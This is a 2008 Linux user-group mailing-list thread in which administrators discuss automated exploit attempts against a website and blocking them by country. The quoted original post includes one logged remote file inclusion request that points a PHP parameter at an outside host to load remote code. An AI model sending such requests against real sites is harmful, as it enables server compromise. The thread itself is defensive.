I too would be interested in knowing this.

I used to get these sorts of php attacks all the time. Along with tons of other common exploits. Since I use a custom java app I was not too worried, but I also took advantage of the fact that our service is only available to US and Canada and cut out every other county with an apache rewrite. That alone cut out just over 90% of the auto attacks we were getting.

From: plug-discuss-bounces@lists.plug.phoenix.az.us [mailto:plug-discuss-bounces@lists.plug.phoenix.az.us] On Behalf Of keith smith
Sent: Wednesday, December 03, 2008 3:40 PM
To: plug-discuss@lists.plug.phoenix.az.us
Subject: OT: Website Exploits

Hi,

I am working on a website that gets a lot of exploit attempts.

They mostly look like this: /index.php?display=http://humano.ya.com/mysons/index.htm?

Our code is set to disregard any value that is not expected.

I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate.

Thanks in advance!

Keith